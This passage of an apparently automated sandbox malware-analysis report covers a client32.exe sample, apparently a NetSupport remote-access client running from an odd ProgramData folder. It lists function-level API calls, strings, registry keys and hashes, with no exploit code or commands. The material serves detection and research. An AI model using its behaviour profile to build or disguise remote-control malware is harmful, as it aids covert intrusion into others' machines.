                                                                                                  • Part of subcall function 69CEA4E0: Sleep.KERNEL32(00000000,?,69CEDA7F,?,00000000), ref: 69CEA581
                                                                                                  • Part of subcall function 69CEA4E0: LeaveCriticalSection.KERNEL32(69D2B898,00000000), ref: 69CEA5B3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$CountEnterExchangeInterlockedLeaveSleepTick_memset_strncpy
                                                                                                • String ID: 1.2$Channel$Client$Publish %d pending services
                                                                                                • API String ID: 1112461860-1140593649
                                                                                                • Opcode ID: 981df005e2695a56ef723d3a15a0fb9031ec4c99479043e909b26e47c99226df
                                                                                                • Instruction ID: b7119fa229493fa7b199ef42b6da21b59be3a70fe851758b36aebd623184a6a9
                                                                                                • Opcode Fuzzy Hash: 981df005e2695a56ef723d3a15a0fb9031ec4c99479043e909b26e47c99226df
                                                                                                • Instruction Fuzzy Hash: 4B51D375A04A898BFF10CB78FA5179A37A4BF06318F10C179DA5293281FB31D946D7A1
                                                                                                Function 11103630 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11103683
                                                                                                • GetStockObject.GDI32(00000004), ref: 111036DB
                                                                                                • RegisterClassA.USER32(?), ref: 111036EF
                                                                                                • CreateWindowExA.USER32 ref: 1110372C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                                • String ID: NSMDesktopWnd
                                                                                                • API String ID: 2669163067-206650970
                                                                                                • Opcode ID: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                                • Instruction ID: a046934e961b92c42b42225909fe4a4d9db65d03d00dbebfa88e6fdde24b4f4f
                                                                                                • Opcode Fuzzy Hash: 3079baf332cc25a70c3d3df9c832fc0325efe936172018c4c3e6d8e20cf8610c
                                                                                                • Instruction Fuzzy Hash: E031F4B4D01719AFCB44CFA9D980AAEFBF8FB08314F50462EE42AE3244E7355900CB94
                                                                                                Function 11145F00 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 80registryCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?), ref: 11145F70
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 11145FD4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseOpen
                                                                                                • String ID: ForceRTL$SOFTWARE\NetSupport Ltd\PCICTL$SOFTWARE\Productive Computer Insight\PCICTL
                                                                                                • API String ID: 47109696-3245241687
                                                                                                • Opcode ID: 1e58ccc398f601655cd21bbef7fe8258e694ae66d2ba0236151b0d49e381710a
                                                                                                • Instruction ID: 1d1f817806b548678a0140876f7b35b9e852c49707e53231e183cf95c3cf5809
                                                                                                • Opcode Fuzzy Hash: 1e58ccc398f601655cd21bbef7fe8258e694ae66d2ba0236151b0d49e381710a
                                                                                                • Instruction Fuzzy Hash: 1E21DD71E0022A9BE764DA64CD80FDEF778AB45718F1041AAE81DF3941D7319D458BA3
                                                                                                Function 111121E0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 79COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 11112140: GetSystemDirectoryA.KERNEL32(?,00000104,?), ref: 1111216A
                                                                                                  • Part of subcall function 11112140: __wsplitpath.LIBCMT ref: 11112185
                                                                                                  • Part of subcall function 11112140: GetVolumeInformationA.KERNEL32 ref: 111121B9
                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 11112288
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ComputerDirectoryInformationNameSystemVolume__wsplitpath
                                                                                                • String ID: $ACM$\Registry\Machine\SOFTWARE\Classes\N%x$\Registry\Machine\SOFTWARE\Classes\N%x.%s
                                                                                                • API String ID: 806825551-1858614750
                                                                                                • Opcode ID: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                                • Instruction ID: ca260b95ce0435fc80d5678de4b29a4f2f4f697687454b99fdfeb2ddb07782e0
                                                                                                • Opcode Fuzzy Hash: 48ba6f8863ffcd44e27bad5e20faa5f1087748d5dcdcaea7fc0175279a4e57c4
                                                                                                • Instruction Fuzzy Hash: C62149B6A042855AD701CE70DD80BFFFFAADB8A204F1445B8D851CB545E736D604C390
                                                                                                Function 11144DD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 111447F0: GetCurrentProcess.KERNEL32(11029A9F,?,11144A43,?), ref: 111447FC
                                                                                                  • Part of subcall function 111447F0: GetModuleFileNameA.KERNEL32(00000000,C:\ProgramData\i99ekubc\client32.exe,00000104,?,11144A43,?), ref: 11144819
                                                                                                • WaitForMultipleObjects.KERNEL32 ref: 11144E25
                                                                                                • ResetEvent.KERNEL32(00000128), ref: 11144E39
                                                                                                • SetEvent.KERNEL32(00000128), ref: 11144E4F
                                                                                                • WaitForMultipleObjects.KERNEL32 ref: 11144E5E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventMultipleObjectsWait$CurrentFileModuleNameProcessReset
                                                                                                • String ID: MiniDump
                                                                                                • API String ID: 1494854734-2840755058
                                                                                                • Opcode ID: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                • Instruction ID: ea994b22643fb5a56552c53957c3f10a02c9a0f0123a866c2d557df6367c4d32
                                                                                                • Opcode Fuzzy Hash: 105b93f749375231fdcb9b481c982d061f92632bc0342d7f03e4e2231c0d94ee
                                                                                                • Instruction Fuzzy Hash: 1F112975A8412577E710DBA8DC81F9BF768AB04B28F200230E634E7AC4EB74A50587A1
                                                                                                Function 69CE8E28 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 64COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                  • Part of subcall function 69CE5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5014
                                                                                                  • Part of subcall function 69CE5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5034
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CE8EAE
                                                                                                • FreeLibrary.KERNEL32(?), ref: 69CE8EBF
                                                                                                  • Part of subcall function 69CE2420: _strrchr.LIBCMT ref: 69CE242E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressCloseFileFreeHandleLibraryModuleNameProc_strrchr
                                                                                                • String ID: NSM247Ctl.dll$Set Is247=%d$pcictl_247.dll
                                                                                                • API String ID: 3215810784-3459472706
                                                                                                • Opcode ID: 477503c5424d30d4c839b5f869a8313c0a7ae2b9a11379ec01ea4b4175a22dcc
                                                                                                • Instruction ID: 082feba74926ad7ba36f27cb77ba322b2356daea443b15f597df4491b6532041
                                                                                                • Opcode Fuzzy Hash: 477503c5424d30d4c839b5f869a8313c0a7ae2b9a11379ec01ea4b4175a22dcc
                                                                                                • Instruction Fuzzy Hash: B4118179A005159BEF15CB61EC41FAE7364BB05389F4094B5FB0AA3240FB71AA44CB61
                                                                                                Function 111479B0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadStringA.USER32 ref: 111479DF
                                                                                                • wsprintfA.USER32 ref: 11147A16
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$ErrorExitLastLoadMessageProcessString
                                                                                                • String ID: #%d$..\ctl32\util.cpp$i < _tsizeof (buf)
                                                                                                • API String ID: 1985783259-2296142801
                                                                                                • Opcode ID: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                • Instruction ID: f4f04ea69c0c381d0959b313e9907706ba85fe26c30e15a9a088fcfc7c116df7
                                                                                                • Opcode Fuzzy Hash: ea150ba1ed1813b9988ca83ab64a483803357b5974e9feb7492af342d5ed009e
                                                                                                • Instruction Fuzzy Hash: 6811E5FAE00218A7D710DEA49D81FEAF36C9B44608F100165FB08F6141EB70AA05CBE4
                                                                                                Function 111101B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
                                                                                                  • Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
                                                                                                  • Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56
                                                                                                • wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • _memset.LIBCMT ref: 11110207
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$AllocateErrorExitHeapLastMessageProcess_malloc_memset
                                                                                                • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                • API String ID: 3234921582-2664294811
                                                                                                • Opcode ID: 97bc59aef264f30227d48638175df661315abb9aea72348d73a936ac7614114a
                                                                                                • Instruction ID: 098e5996781ad60247c7fcf5caa4ca36f886f8102b778af333740a2f918ca33d
                                                                                                • Opcode Fuzzy Hash: 97bc59aef264f30227d48638175df661315abb9aea72348d73a936ac7614114a
                                                                                                • Instruction Fuzzy Hash: C0F0F6B6E4022863C7209AA49D01FEFF37C9F91609F0001A9FE05B7241EA75AA11C7E5
                                                                                                Function 11031F30 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 11031FE6
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wsprintf$ErrorExitLastMessageProcess
                                                                                                • String ID: %s%s.bin$445817$clientinv.cpp$m_pDoInv == NULL
                                                                                                • API String ID: 4180936305-1165179207
                                                                                                • Opcode ID: d3e42ad2085115a2bbc1dc31e6289f361993e2543b0696b5117b3c6d4b3d699b
                                                                                                • Instruction ID: 4b30c984cb9feb044c1d7ab8c0844ab34c920fbc261825ed793c706054f3ad77
                                                                                                • Opcode Fuzzy Hash: d3e42ad2085115a2bbc1dc31e6289f361993e2543b0696b5117b3c6d4b3d699b
                                                                                                • Instruction Fuzzy Hash: D82190B5F00705AFD710CF65CC41BAAB7F4EB88758F10853DE86697681EB35A8008B51
                                                                                                Function 69D049F7 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • _malloc.LIBCMT ref: 69D04A05
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • _free.LIBCMT ref: 69D04A18
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644395314.0000000069CE0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644406322.0000000069D20000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644410142.0000000069D29000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644413558.0000000069D2E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644421718.0000000069D30000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocateHeap_free_malloc
                                                                                                • String ID:
                                                                                                • API String ID: 1020059152-0
                                                                                                • Opcode ID: c28dd7c47f4b9f3353f592d7b1452a9de3d12874d2bc4e59691fff694010595c
                                                                                                • Instruction ID: eda3b8f6b1211e703ea314e18066ba8f8cacd44e6f0dd325afba6429b09fc387
                                                                                                • Opcode Fuzzy Hash: c28dd7c47f4b9f3353f592d7b1452a9de3d12874d2bc4e59691fff694010595c
                                                                                                • Instruction Fuzzy Hash: F2112736488211EECB119F78E964F4D3754FF563BCB50D13AE948ABD40FB30888086A4
                                                                                                Function 11145240 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNEL32(11145918,00000000,?,11145918,00000000), ref: 1114525C
                                                                                                • __strdup.LIBCMT ref: 11145277
                                                                                                  • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                                                  • Part of subcall function 11145240: _free.LIBCMT ref: 1114529E
                                                                                                • _free.LIBCMT ref: 111452AC
                                                                                                  • Part of subcall function 11163AA5: HeapFree.KERNEL32(00000000,00000000), ref: 11163ABB
                                                                                                  • Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD
                                                                                                • CreateDirectoryA.KERNEL32(11145918,00000000,?,?,?,11145918,00000000), ref: 111452B7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                • Associated: 00000004.00000002.644282099.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644315859.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644324198.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644329005.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.644332838.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
